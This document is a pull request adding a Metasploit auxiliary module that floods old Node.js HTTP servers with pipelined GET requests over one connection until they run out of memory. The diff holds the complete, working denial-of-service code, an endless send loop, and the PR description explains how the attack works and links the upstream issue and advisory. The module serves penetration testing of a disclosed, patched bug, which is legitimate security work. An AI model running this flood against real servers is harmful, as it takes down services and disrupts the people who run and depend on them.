### PR TITLE
add module auxiliary/dos/http/nodejs_pipeline

### DIFF
--- a/modules/auxiliary/dos/http/nodejs_pipeline.rb
+++ b/modules/auxiliary/dos/http/nodejs_pipeline.rb
@@ -1,0 +1,50 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Dos
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Node.js Pipelined Requests Flood Denial of Service (DoS)',
+      'Description'    => %q{
+          Makes a large number of requests over the same connection, without reading responses.
+          This causes Node.js to allocate resources and run out of memory.
+          Affects version <= 0.10.20 and <= 0.8.25.
+      },
+      'Author'         =>
+        [
+          'Marek Majkowski (original discovery)',
+          'Filippo Valsorda (Metasploit module) <filippo.valsorda[at]gmail.com>'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'https://github.com/joyent/node/issues/6214']
+        ],
+      'DisclosureDate' => 'Oct 18 2013'))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+      ],
+      self.class)
+  end
+
+  def run
+    print_status("#{rhost}:#{rport} - Sending requests...")
+
+    req = "GET / HTTP/1.1\r\n\r\n"
+
+    connect
+    loop do
+      sock.put(req)
+    end
+  end
+end


### PR DESCRIPTION
Add a HTTP DoS module for the recent Node.js vulnerability.
Simply flood requests pipelined over a single connection until the server runs out of memory.

I really hadn't to do a lot of work. (First module, don't be too harsh)

Not sure if I should stop when the server becomes unresponsive or what.

Here is the nodejs issue joyent/node#6214 ([cache](http://webcache.googleusercontent.com/search?rlz=1C5CHFA_enIT503IT503&espv=210&es_sm=91&sclient=psy-ab&q=cache%3Ahttps%3A%2F%2Fgithub.com%2Fjoyent%2Fnode%2Fissues%2F6214&oq=cache%3Ahttps%3A%2F%2Fgithub.com%2Fjoyent%2Fnode%2Fissues%2F6214&gs_l=serp.12...0.0.1.6345.0.0.0.0.0.0.0.0..0.0)), the [commit](joyent/node/commit/085dd30e93da67362f044ad1b3b6b2d997064692) (includes a PoC) and the [advisory](https://groups.google.com/forum/#!topic/nodejs/NEbweYB0ei0) (no CVE).
